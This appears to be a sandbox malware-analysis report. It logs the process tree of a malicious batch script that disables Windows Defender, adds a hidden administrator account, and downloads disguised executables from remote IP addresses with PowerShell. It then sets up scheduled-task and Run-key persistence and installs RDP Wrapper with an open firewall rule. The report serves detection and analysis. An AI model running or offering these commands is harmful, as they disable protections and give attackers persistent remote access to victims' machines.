\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry MeshAgent.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\Telemetry\wmic.exe\VBScriptSetScriptStateStarted = "240623953" wmic.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 2 IoCs
pid Process 3832 PING.EXE 4668 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1724 schtasks.exe 4808 schtasks.exe 1272 schtasks.exe 4964 schtasks.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 53 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 54 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4572 powershell.exe 4572 powershell.exe 4788 powershell.exe 4788 powershell.exe 1852 powershell.exe 1852 powershell.exe 5012 powershell.exe 5012 powershell.exe 3276 wmic.exe 3276 wmic.exe 3276 wmic.exe 3276 wmic.exe 2984 powershell.exe 2984 powershell.exe 4496 wmic.exe 4496 wmic.exe 4496 wmic.exe 4496 wmic.exe 1996 wmic.exe 1996 wmic.exe 1996 wmic.exe 1996 wmic.exe 936 wmic.exe 936 wmic.exe 936 wmic.exe 936 wmic.exe 3856 wmic.exe 3856 wmic.exe 3856 wmic.exe 3856 wmic.exe 3212 wmic.exe 3212 wmic.exe 3212 wmic.exe 3212 wmic.exe 4372 powershell.exe 4372 powershell.exe 2848 powershell.exe 2848 powershell.exe 1992 wmic.exe 1992 wmic.exe 1992 wmic.exe 1992 wmic.exe 4272 wmic.exe 4272 wmic.exe 4272 wmic.exe 4272 wmic.exe 4992 wmic.exe 4992 wmic.exe 4992 wmic.exe 4992 wmic.exe 3280 wmic.exe 3280 wmic.exe 3280 wmic.exe 3280 wmic.exe 4364 wmic.exe 4364 wmic.exe 4364 wmic.exe 4364 wmic.exe 2956 powershell.exe 2956 powershell.exe 1080 powershell.exe 1080 powershell.exe 5116 powershell.exe 5116 powershell.exe -
Suspicious behavior: LoadsDriver 11 IoCs
pid Process 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found 668 Process not Found -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4572 powershell.exe Token: SeIncreaseQuotaPrivilege 4572 powershell.exe Token: SeSecurityPrivilege 4572 powershell.exe Token: SeTakeOwnershipPrivilege 4572 powershell.exe Token: SeLoadDriverPrivilege 4572 powershell.exe Token: SeSystemProfilePrivilege 4572 powershell.exe Token: SeSystemtimePrivilege 4572 powershell.exe Token: SeProfSingleProcessPrivilege 4572 powershell.exe Token: SeIncBasePriorityPrivilege 4572 powershell.exe Token: SeCreatePagefilePrivilege 4572 powershell.exe Token: SeBackupPrivilege 4572 powershell.exe Token: SeRestorePrivilege 4572 powershell.exe Token: SeShutdownPrivilege 4572 powershell.exe Token: SeDebugPrivilege 4572 powershell.exe Token: SeSystemEnvironmentPrivilege 4572 powershell.exe Token: SeRemoteShutdownPrivilege 4572 powershell.exe Token: SeUndockPrivilege 4572 powershell.exe Token: SeManageVolumePrivilege 4572 powershell.exe Token: 33 4572 powershell.exe Token: 34 4572 powershell.exe Token: 35 4572 powershell.exe Token: 36 4572 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeIncreaseQuotaPrivilege 4788 powershell.exe Token: SeSecurityPrivilege 4788 powershell.exe Token: SeTakeOwnershipPrivilege 4788 powershell.exe Token: SeLoadDriverPrivilege 4788 powershell.exe Token: SeSystemProfilePrivilege 4788 powershell.exe Token: SeSystemtimePrivilege 4788 powershell.exe Token: SeProfSingleProcessPrivilege 4788 powershell.exe Token: SeIncBasePriorityPrivilege 4788 powershell.exe Token: SeCreatePagefilePrivilege 4788 powershell.exe Token: SeBackupPrivilege 4788 powershell.exe Token: SeRestorePrivilege 4788 powershell.exe Token: SeShutdownPrivilege 4788 powershell.exe Token: SeDebugPrivilege 4788 powershell.exe Token: SeSystemEnvironmentPrivilege 4788 powershell.exe Token: SeRemoteShutdownPrivilege 4788 powershell.exe Token: SeUndockPrivilege 4788 powershell.exe Token: SeManageVolumePrivilege 4788 powershell.exe Token: 33 4788 powershell.exe Token: 34 4788 powershell.exe Token: 35 4788 powershell.exe Token: 36 4788 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeIncreaseQuotaPrivilege 1852 powershell.exe Token: SeSecurityPrivilege 1852 powershell.exe Token: SeTakeOwnershipPrivilege 1852 powershell.exe Token: SeLoadDriverPrivilege 1852 powershell.exe Token: SeSystemProfilePrivilege 1852 powershell.exe Token: SeSystemtimePrivilege 1852 powershell.exe Token: SeProfSingleProcessPrivilege 1852 powershell.exe Token: SeIncBasePriorityPrivilege 1852 powershell.exe Token: SeCreatePagefilePrivilege 1852 powershell.exe Token: SeBackupPrivilege 1852 powershell.exe Token: SeRestorePrivilege 1852 powershell.exe Token: SeShutdownPrivilege 1852 powershell.exe Token: SeDebugPrivilege 1852 powershell.exe Token: SeSystemEnvironmentPrivilege 1852 powershell.exe Token: SeRemoteShutdownPrivilege 1852 powershell.exe Token: SeUndockPrivilege 1852 powershell.exe Token: SeManageVolumePrivilege 1852 powershell.exe Token: 33 1852 powershell.exe Token: 34 1852 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 700 wrote to memory of 4572 700 cmd.exe 81 PID 700 wrote to memory of 4572 700 cmd.exe 81 PID 700 wrote to memory of 2092 700 cmd.exe 83 PID 700 wrote to memory of 2092 700 cmd.exe 83 PID 2092 wrote to memory of 3980 2092 cmd.exe 84 PID 2092 wrote to memory of 3980 2092 cmd.exe 84 PID 700 wrote to memory of 5080 700 cmd.exe 85 PID 700 wrote to memory of 5080 700 cmd.exe 85 PID 700 wrote to memory of 5080 700 cmd.exe 85 PID 700 wrote to memory of 4788 700 cmd.exe 88 PID 700 wrote to memory of 4788 700 cmd.exe 88 PID 700 wrote to memory of 1852 700 cmd.exe 89 PID 700 wrote to memory of 1852 700 cmd.exe 89 PID 700 wrote to memory of 5012 700 cmd.exe 90 PID 700 wrote to memory of 5012 700 cmd.exe 90 PID 1892 wrote to memory of 3276 1892 MeshAgent.exe 91 PID 1892 wrote to memory of 3276 1892 MeshAgent.exe 91 PID 1892 wrote to memory of 3276 1892 MeshAgent.exe 91 PID 700 wrote to memory of 2984 700 cmd.exe 93 PID 700 wrote to memory of 2984 700 cmd.exe 93 PID 1892 wrote to memory of 4496 1892 MeshAgent.exe 94 PID 1892 wrote to memory of 4496 1892 MeshAgent.exe 94 PID 1892 wrote to memory of 4496 1892 MeshAgent.exe 94 PID 1892 wrote to memory of 1996 1892 MeshAgent.exe 96 PID 1892 wrote to memory of 1996 1892 MeshAgent.exe 96 PID 1892 wrote to memory of 1996 1892 MeshAgent.exe 96 PID 700 wrote to memory of 1616 700 cmd.exe 98 PID 700 wrote to memory of 1616 700 cmd.exe 98 PID 1616 wrote to memory of 3140 1616 net.exe 99 PID 1616 wrote to memory of 3140 1616 net.exe 99 PID 700 wrote to memory of 1900 700 cmd.exe 100 PID 700 wrote to memory of 1900 700 cmd.exe 100 PID 1900 wrote to memory of 3844 1900 net.exe 101 PID 1900 wrote to memory of 3844 1900 net.exe 101 PID 700 wrote to memory of 2740 700 cmd.exe 102 PID 700 wrote to memory of 2740 700 cmd.exe 102 PID 2740 wrote to memory of 1132 2740 net.exe 103 PID 2740 wrote to memory of 1132 2740 net.exe 103 PID 700 wrote to memory of 640 700 cmd.exe 104 PID 700 wrote to memory of 640 700 cmd.exe 104 PID 700 wrote to memory of 4072 700 cmd.exe 105 PID 700 wrote to memory of 4072 700 cmd.exe 105 PID 4072 wrote to memory of 4264 4072 net.exe 106 PID 4072 wrote to memory of 4264 4072 net.exe 106 PID 700 wrote to memory of 3360 700 cmd.exe 107 PID 700 wrote to memory of 3360 700 cmd.exe 107 PID 3360 wrote to memory of 1048 3360 net.exe 108 PID 3360 wrote to memory of 1048 3360 net.exe 108 PID 1892 wrote to memory of 936 1892 MeshAgent.exe 109 PID 1892 wrote to memory of 936 1892 MeshAgent.exe 109 PID 1892 wrote to memory of 936 1892 MeshAgent.exe 109 PID 1892 wrote to memory of 3856 1892 MeshAgent.exe 111 PID 1892 wrote to memory of 3856 1892 MeshAgent.exe 111 PID 1892 wrote to memory of 3856 1892 MeshAgent.exe 111 PID 700 wrote to memory of 5076 700 cmd.exe 113 PID 700 wrote to memory of 5076 700 cmd.exe 113 PID 1892 wrote to memory of 3212 1892 MeshAgent.exe 114 PID 1892 wrote to memory of 3212 1892 MeshAgent.exe 114 PID 1892 wrote to memory of 3212 1892 MeshAgent.exe 114 PID 700 wrote to memory of 4004 700 cmd.exe 116 PID 700 wrote to memory of 4004 700 cmd.exe 116 PID 700 wrote to memory of 1788 700 cmd.exe 117 PID 700 wrote to memory of 1788 700 cmd.exe 117 PID 700 wrote to memory of 4536 700 cmd.exe 118 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
pid Process 2104 attrib.exe 5072 attrib.exe 2292 attrib.exe 4588 attrib.exe
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:700 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4572
-
-
C:\Windows\system32\cmd.execmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"2⤵
- Suspicious use of WriteProcessMemory
PID:2092 -
C:\Windows\system32\net.exenet use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"3⤵PID:3980
-
-
-
\??\UNC\45.139.196.250\shear\s.exe\\45.139.196.250\shear\s.exe -fullinstall2⤵
- Sets service image path in registry
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:5080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'c:\'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4788
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5012
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2984
-
-
C:\Windows\system32\net.exenet user t1 Raed12346@@ /add2⤵
- Suspicious use of WriteProcessMemory
PID:1616 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 Raed12346@@ /add3⤵PID:3140
-
-
-
C:\Windows\system32\net.exenet localgroup administrators t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1900 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators t1 /add3⤵PID:3844
-
-
-
C:\Windows\system32\net.exenet localgroup Administratörer t1 /add2⤵
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administratörer t1 /add3⤵PID:1132
-
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f2⤵
- Hide Artifacts: Hidden Users
PID:640
-
-
C:\Windows\system32\net.exenet user t1 /active:no2⤵
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:no3⤵PID:4264
-
-
-
C:\Windows\system32\net.exenet user t1 /active:yes2⤵
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user t1 /active:yes3⤵PID:1048
-
-
-
C:\Windows\system32\ReAgentc.exereagentc.exe /disable2⤵
- Drops file in Windows directory
PID:5076
-
-
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f2⤵PID:4004
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f2⤵PID:1788
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f2⤵PID:4536
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:1136
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f2⤵PID:1056
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f2⤵PID:2088
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵
- Modifies Windows Defender Real-time Protection settings
PID:3540
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f2⤵PID:4588
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f2⤵PID:1928
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f2⤵PID:5068
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵PID:1528
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4372
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2848
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1080
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "ngrok.zip" -DestinationPath "."2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5116
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:1732
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2292
-
-
C:\Windows\system32\attrib.exeattrib +s +h C:\programdata\Windata\*.*2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:4588
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:2104
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:4808
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:1272
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it2⤵
- Scheduled Task/Job: Scheduled Task
PID:4964
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"2⤵
- Adds Run key to start application
PID:904
-
-
C:\Windows\system32\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"2⤵
- Adds Run key to start application
PID:2796
-
-
C:\Windows\system32\attrib.exeattrib -s +h C:\programdata\Windata\*.bat2⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5072
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\installer.bat2⤵
- Drops file in Program Files directory
PID:4728 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:2536
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"3⤵PID:1480
-
-
C:\Windows\system32\cmd.execmd /C C:\ProgramData\Windata\hrdp\install.bat3⤵PID:2772
-
C:\ProgramData\Windata\hrdp\RDPWInst.exe"C:\ProgramData\Windata\hrdp\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:1236 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4328
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
PID:1956
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops file in Program Files directory
PID:4176
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "update.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
PID:936
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowershell Expand-Archive "autoupdate.zip" -DestinationPath "."3⤵
- Drops file in Program Files directory
PID:1320
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"3⤵
- Drops file in Program Files directory
PID:3268 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:2940
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3440
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3360
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4524
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2432
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4584
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1016
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3196
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2592
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:5012
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\re-install.bat"3⤵
- Drops file in Program Files directory
PID:1200 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:652
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
PID:1600 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:468
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:3640 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1248
-
-
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:2972
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1116
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:5068
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:3996
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:2704
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:936
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:4688
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1272
-
-
C:\Windows\system32\findstr.exefindstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"4⤵PID:1652
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -r4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1764
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"3⤵PID:2292
-
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:1656
-
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:104⤵
- Scheduled Task/Job: Scheduled Task
PID:1724
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"4⤵
- Command and Scripting Interpreter: PowerShell
PID:2204
-
-
-
C:\Windows\system32\cmd.execmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"3⤵
- Drops file in Program Files directory
PID:1668 -
C:\Windows\system32\fsutil.exefsutil dirty query C:4⤵PID:2216
-
-
C:\Windows\system32\sc.exesc queryex "TermService"4⤵
- Launches sc.exe
PID:5028
-
-
C:\Windows\system32\find.exefind "STATE"4⤵PID:3968
-
-
C:\Windows\system32\find.exefind /v "RUNNING"4⤵PID:1240
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c query session rdp-tcp4⤵PID:2660
-
C:\Windows\system32\query.exequery session rdp-tcp5⤵PID:2020
-
C:\Windows\system32\qwinsta.exe"C:\Windows\system32\qwinsta.exe" rdp-tcp6⤵PID:1104
-
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"4⤵
- Server Software Component: Terminal Services DLL
PID:1812
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -u4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3056 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall delete rule name="Remote Desktop"5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1128
-
-
-
C:\Program Files\RDP Wrapper\RDPWInst.exe"C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o4⤵
- Server Software Component: Terminal Services DLL
- Executes dropped EXE
- Modifies WinLogon
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
PID:2392 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow5⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4928
-
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SecurityLayer /t reg_dword /d 0x2 /f4⤵PID:4304
-
-
C:\Windows\system32\reg.exereg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v MinEncryptionLevel /t reg_dword /d 0x2 /f4⤵PID:4548
-
-
C:\Windows\system32\reg.exereg query "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f "rdpwrap.dll"4⤵PID:1844
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c cscript //nologo "C:\Program Files\RDP Wrapper\autoupdate.bat?.wsf" //job:fileVersion "C:\Windows\System32\termsrv.dll"4⤵PID:468
-
